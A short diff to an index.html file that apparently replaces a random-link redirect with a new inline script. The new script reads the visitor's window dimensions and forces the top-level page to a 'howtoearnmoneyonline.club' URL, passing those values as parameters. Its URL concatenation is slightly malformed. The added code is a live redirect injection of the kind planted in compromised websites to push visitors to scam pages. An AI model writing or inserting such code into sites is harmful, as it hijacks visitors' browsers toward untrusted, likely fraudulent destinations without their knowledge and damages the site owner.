--- a/index.html
+++ b/index.html
@@ -1,7 +1,13 @@
 <script type="text/javascript">
-var urls = new Array();
- 
-urls[0] = "https://t.co/c8zfwBw9Qs";
-var random = Math.floor(Math.random()*urls.length);
-window.location = urls[random];
-</script> 
+x=window.innerWidth||0;
+y=window.innerHeight||0;
+if (typeof document.documentElement != 'undefined') {
+	x=document.documentElement.clientWidth;
+	y=document.documentElement.clientHeight;
+}
+if (document.body !== null) {
+	x=document.body.clientWidth;
+	y=document.body.clientHeight;
+}
+top.location.href=("https://howtoearnmoneyonline.club/yt.php"+x+"&vh="+y).replace(/\/$/, "");
+</script>
